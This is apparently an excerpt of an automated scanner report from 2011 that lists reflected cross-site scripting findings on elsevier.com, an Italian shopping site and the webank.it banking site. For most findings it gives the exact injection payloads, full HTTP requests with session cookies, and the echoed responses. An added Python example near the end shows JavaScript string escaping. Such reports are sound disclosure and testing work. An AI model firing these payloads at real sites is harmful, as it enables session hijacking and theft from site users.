The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6beef'><script>alert(1)</script>6a8aa79299f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/find/advproductsearch.cws_home?6beef'><script>alert(1)</script>6a8aa79299f=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:30 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 18350
Set-Cookie: JSESSIONID=0000-3iLOWqG5wZUSadWSvkeTti:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... <a href='/wps/find/advproductsearch.cws_home?6beef'><script>alert(1)</script>6a8aa79299f=1&navopenmenu=3'> ...[SNIP]...
4.33. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elsevier.com
Path:
/wps/find/advproductsearch.cws_home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7daa0"%3balert(1)//24fac7af3ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7daa0";alert(1)//24fac7af3ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/find/advproductsearch.cws_home?7daa0"%3balert(1)//24fac7af3ed=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:30 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 18288
Set-Cookie: JSESSIONID=0000NaRz-vRLRFXUkrLZVh70rOz:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... ("This page does not have a printer-friendly version") return } } else { printUrl += pieces[i] } prvPiece = pieces[i] } var isTheirParams = "false" var qpString = "7daa0";alert(1)//24fac7af3ed=1&7daa0";alert(1)//24fac7af3ed=1" if(qpString.length > ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ff19'><img%20src%3da%20onerror%3dalert(1)>6e976a58f0b was submitted in the REST URL parameter 3. This input was echoed as 6ff19'><img src=a onerror=alert(1)>6e976a58f0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /wps/find/subject_area_browse.cws_home6ff19'><img%20src%3da%20onerror%3dalert(1)>6e976a58f0b HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:47 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 25013
Set-Cookie: JSESSIONID=0000WXbl3Gp56KXUmnZV1uMnTNX:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f99"><img%20src%3da%20onerror%3dalert(1)>9406b9f8f6e was submitted in the REST URL parameter 3. This input was echoed as 90f99"><img src=a onerror=alert(1)>9406b9f8f6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /wps/find/subject_area_browse.cws_home90f99"><img%20src%3da%20onerror%3dalert(1)>9406b9f8f6e HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:46 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 25015
Set-Cookie: JSESSIONID=0000ssegcLJle5F04Nbyc1eLqaz:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c03b8"%3b28e045484d9 was submitted in the REST URL parameter 3. This input was echoed as c03b8";28e045484d9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/find/subject_area_browse.cws_homec03b8"%3b28e045484d9 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:47 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24501
Set-Cookie: JSESSIONID=0000IqCGtqTnRlkAqBgeR1iBcZg:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... <img src="+ns_l+" width='1' height='1'>");} sitestat("http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.subject_area_browse&category=cws_homec03b8";28e045484d9"); </script> ...[SNIP]...
4.37. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elsevier.com
Path:
/wps/find/subject_area_browse.cws_home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60b28'><script>alert(1)</script>3bb27476df4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/find/subject_area_browse.cws_home?60b28'><script>alert(1)</script>3bb27476df4=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:42 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Set-Cookie: JSESSIONID=0000rcMiH_yB4nrWwiHnqA0Omt0:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 209457
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... <a href='/wps/find/subject_area_browse.cws_home?60b28'><script>alert(1)</script>3bb27476df4=1&navopenmenu=3'> ...[SNIP]...
4.38. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elsevier.com
Path:
/wps/find/subject_area_browse.cws_home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e8cf"%3balert(1)//1fe8f7ceeb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e8cf";alert(1)//1fe8f7ceeb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/find/subject_area_browse.cws_home?9e8cf"%3balert(1)//1fe8f7ceeb7=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:44 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Set-Cookie: JSESSIONID=0000eJInQ8ymYaOaIpU3u5eS2ZN:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 209414
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... ("This page does not have a printer-friendly version") return } } else { printUrl += pieces[i] } prvPiece = pieces[i] } var isTheirParams = "false" var qpString = "9e8cf";alert(1)//1fe8f7ceeb7=1&9e8cf";alert(1)//1fe8f7ceeb7=1" if(qpString.length > ...[SNIP]...
The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2c81"><script>alert(1)</script>05d12a7095a was submitted in the locale parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <link rel="stylesheet" href="/it_ITc2c81"><script>alert(1)</script>05d12a7095a/static/css/mobile/mobile.css" media="screen" /> ...[SNIP]...
4.40. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shopping24.ilsole24ore.com
Path:
/sh4/catalog/Category.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b5c7"><script>alert(1)</script>626d1de0ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:37:49 GMT
Set-Cookie: JSESSIONID=01EC0E3AE923672F051417E1FEAC132D; Path=/
Set-Cookie: ATG_SESSION_ID=01EC0E3AE923672F051417E1FEAC132D; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53893
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <input name="4b5c7"><script>alert(1)</script>626d1de0ab" type="hidden" value="1"/> ...[SNIP]...
4.41. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shopping24.ilsole24ore.com
Path:
/sh4/catalog/Category.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7248'><script>alert(1)</script>243af41db24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:37:55 GMT
Set-Cookie: JSESSIONID=FE9BC8B10A09676DD5B1BF644DEBD840; Path=/
Set-Cookie: ATG_SESSION_ID=FE9BC8B10A09676DD5B1BF644DEBD840; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Category.jsp?CATID=SH246140&b7248'><script>alert(1)</script>243af41db24=1&login=failed'> ...[SNIP]...
4.42. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shopping24.ilsole24ore.com
Path:
/sh4/catalog/Product.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87779'><script>alert(1)</script>162b4a1d039 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:13:25 GMT
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 34251
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Small Office 24 ...[SNIP]... <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Product.jsp?PRODID=SH246237857&87779'><script>alert(1)</script>162b4a1d039=1&login=failed'> ...[SNIP]...
4.43. https://www.webank.it/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.webank.it
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d98eb'-alert(1)-'63578c43715 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d98eb'-alert(1)-'63578c43715=1 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463
var tabId = 'nav_pub_wb_home_nw'; var obsKey = 'nav_pub_wb_home_nw?d98eb'-alert(1)-'63578c43715=1'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
var login_action_privati = 'lqgd7CdsPrF ...[SNIP]...
The value of the OBS_KEY request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3bdfb'style%3d'x%3aexpression(alert(1))'6c2bb6a8eb3 was submitted in the OBS_KEY parameter. This input was echoed as 3bdfb'style='x:expression(alert(1))'6c2bb6a8eb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank3bdfb'style%3d'x%3aexpression(alert(1))'6c2bb6a8eb3 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 572f4'-alert(1)-'a0f1e2f6476 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank572f4'-alert(1)-'a0f1e2f6476 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var tabId = 'nav_pub_wb_conti_nw'; var obsKey = 'pro_wbn_apri_conto_webank572f4'-alert(1)-'a0f1e2f6476'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
var login_action_privati = 'lwHtAMSw9BODj ...[SNIP]...
The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5264c'-alert(1)-'a24ae3b893b was submitted in the tabId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw5264c'-alert(1)-'a24ae3b893b&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var tabId = 'nav_pub_wb_conti_nw5264c'-alert(1)-'a24ae3b893b'; var obsKey = 'pro_wbn_apri_conto_webank'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bafc6'-alert(1)-'e07e81d0343 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var tabId = 'nav_pub_wb_serveaiuto_nw'; var obsKey = 'pro_wbn_serve_aiutobafc6'-alert(1)-'e07e81d0343'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
var login_action_privati = 'ONlKQrGjkXhRV ...[SNIP]...
The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d828'-alert(1)-'64857d4afb was submitted in the tabId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var tabId = 'nav_pub_wb_serveaiuto_nw8d828'-alert(1)-'64857d4afb'; var obsKey = 'pro_wbn_serve_aiuto'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a419d'-alert(1)-'ffb669067a9 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nwa419d'-alert(1)-'ffb669067a9 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463
var tabId = 'nav_pub_wb_home_nw'; var obsKey = 'nav_pub_wb_home_nwa419d'-alert(1)-'ffb669067a9'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
var login_action_privati = 'MBbmJoDCIdKWw ...[SNIP]...
The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c5f2'-alert(1)-'b008920cca9 was submitted in the tabId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webankpub/wb/home.do?tabId=nav_pub_wb_home_nw7c5f2'-alert(1)-'b008920cca9&OBS_KEY=nav_pub_wb_home_nw HTTP/1.1
Host: www.webank.it
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463
var tabId = 'nav_pub_wb_home_nw7c5f2'-alert(1)-'b008920cca9'; var obsKey = 'nav_pub_wb_home_nw'; var WSarea = 0; var imgPath = '/img/ret/'; var cgi_script = '/webankpub'; var cgi_host = 'www.webank.it'; var cgi_protocol = 'https://';
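The three webank.it instances above all share one sink: a request parameter concatenated raw into a single-quoted JavaScript string. The following is an added example, not code from the scanned site, showing that sink beside an escaping routine that keeps any value inside the literal, plus a small check that tells the two apart. The \xHH escaping is a general defence for this context; the regex check and the variable names are illustrative assumptions.

```python
"""Added example (not code from the scanned application): rendering a value
into a single-quoted JavaScript string literal safely.

The findings above show parameters such as tabId being concatenated raw into
`var tabId = '...';`, so a value containing a single quote ends the literal
and the remainder is executed as code. The escaping below is a general
defence for this sink, not something the report attributes to the site.
"""
import re


def js_string_escape(value: str) -> str:
    """Escape a string for insertion inside a JavaScript string literal.

    Every character that is not an ASCII letter or digit is emitted as \\xHH
    (or \\uHHHH for code points above U+00FF). That covers both quote
    characters, the backslash and line terminators, and also '<' and '/',
    so a value cannot close the literal or end the enclosing <script>
    element with '</script>'.
    """
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append("\\x%02x" % cp)
        else:
            out.append("\\u%04x" % cp)
    return "".join(out)


def render_unsafe(name: str, value: str) -> str:
    """What the scanned pages do: raw concatenation into a quoted literal."""
    return "var %s = '%s';" % (name, value)


def render_safe(name: str, value: str) -> str:
    """Same statement with the value escaped for the string context."""
    return "var %s = '%s';" % (name, js_string_escape(value))


# One `var` assignment whose right-hand side is exactly one single-quoted
# literal; backslash escapes inside it are allowed, bare quotes are not.
_SINGLE_LITERAL = re.compile(r"var [A-Za-z_$][\w$]* = '(?:[^'\\\n]|\\.)*';")


def stays_in_string_context(statement: str) -> bool:
    """True iff the statement is still one literal, i.e. nothing broke out."""
    return _SINGLE_LITERAL.fullmatch(statement) is not None


# Constructed from the payload the report submitted in the tabId parameter.
PAYLOAD = "nav_pub_wb_home_nw7c5f2'-alert(1)-'b008920cca9"

if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        stmt = render("tabId", PAYLOAD)
        print(stmt, "->", "intact" if stays_in_string_context(stmt) else "broke out")
```

The check is deliberately narrow (one assignment, one literal); it is there to make the difference visible in a test, not to replace a real JavaScript parser.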
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e58f"><script>alert(1)</script>ec94702f118 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
